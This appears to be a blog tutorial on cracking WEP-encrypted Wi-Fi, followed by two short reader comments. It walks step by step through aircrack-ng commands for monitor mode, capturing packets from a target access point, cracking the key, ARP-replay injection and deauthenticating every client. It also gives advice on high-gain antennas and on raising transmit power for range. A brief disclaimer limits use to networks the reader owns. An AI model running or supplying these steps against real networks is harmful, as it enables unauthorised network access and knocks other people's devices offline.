Visitor counter, Heat Map, Conversion tracking, Search Rank

How to Hack a WEP encrypted Wifi Access Point

In this article I would be talking about how to crack WEP encrypted wireless LAN. To start with we would require a wireless card which supports packet injection. I would suggest buy AWUS 036NH Alfa Card from ebay. It is available for less than $30.

 

 Download a image file of Kali linux from https://www.kali.org/downloads/ and install it.

 Plug in the Wireless USB dongle and check the inteface name for the newly inserted dongle. Lets say the OS calls it wlan1. Now start airmon-ng suite giving the following command.

 airmon-ng start wlan1

 Now check the various wireless network which are transmitting

 airodump-ng mon0

 Identify the particular channel of the WEP encrypted transmission . Lets say its channel 1 . Switch channel to 1 . Further identify the bssid of the AP and give the following command to collect all the packets in a file from the intended AP.

airodump-ng mon0 --channel 1 --write dumpFile --bssid 11:22:33:44:55:66

 where 11:22:33:44:55:66 is the BSSID of the network

 Now start another terminal and start the cracking process

aircrack-ng dumpFile.cap

The above process is passive. Incase you want to do active cracking one needs to use arp-replay

 

 Taking the above setup , lets open a third terminal and give the command

 aireplay-ng --arpreplay -e NetworkName mon0 -a 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF

 where NetworkName is the ESSID of the network and AA:BB:CC:DD:EE:FF is an already associated client.

 In addition open a fourth terminal and give a command to deauthenticate all clients associated to the AP

 aireplay-ng --deauth 0 -e NetworkName mon0 -a 11:22:33:44:55:66

To accomplish the above we should have a good receive signal strength from the AP.

 I would recommend using a 24 db parabolic antenna for the same. This should be available for less than $30.

 

 In addition to connect the Alfa card to the antenna you would require a N Male to RP-SMA Male connector as shown below. This should cost another $5.

 

 You may require an antenna extension cable (N Male to Female) as shown if the antenna is required to be placed at a distance from the Alfa card. However, not that this would cause reduce the received signal strength.

 

Therefore I would suggest keep the Alfa card close to antenna and use a good quality USB extension cable as shown below having a (protective metallic sheath ) to cater for the distance between your Alfa card and PC/laptop.

 

  Now to increse the power of the wifi card give the following command

 iwconfig txpower wlan1 33

 However for this you need to tweak your system as given in my another article titled “ How to increase transmitted power in wireless card

 Note : It is brought to your notice that try the above setup only networks which you own. Trying the above on a network not owned by you is not legal.

 

Comments   

0 #2 android 2015-10-01 14:42
Undeniably imagine that that you stated. Your favorite reason appeared to
be on the internet the simplest thing to have in mind of. I say to you, I definitely get annoyed even as folks consider issues
that they just do not recognise about. You controlled to hit the nail upon the highest and outlined out the whole thing with no need side effect , folks can take a
signal. Will probably be again to get more. Thanks
Quote
0 #1 Maverick 2014-04-16 11:12
A very practical article......re ally educative.
Quote

Add comment


Security code
Refresh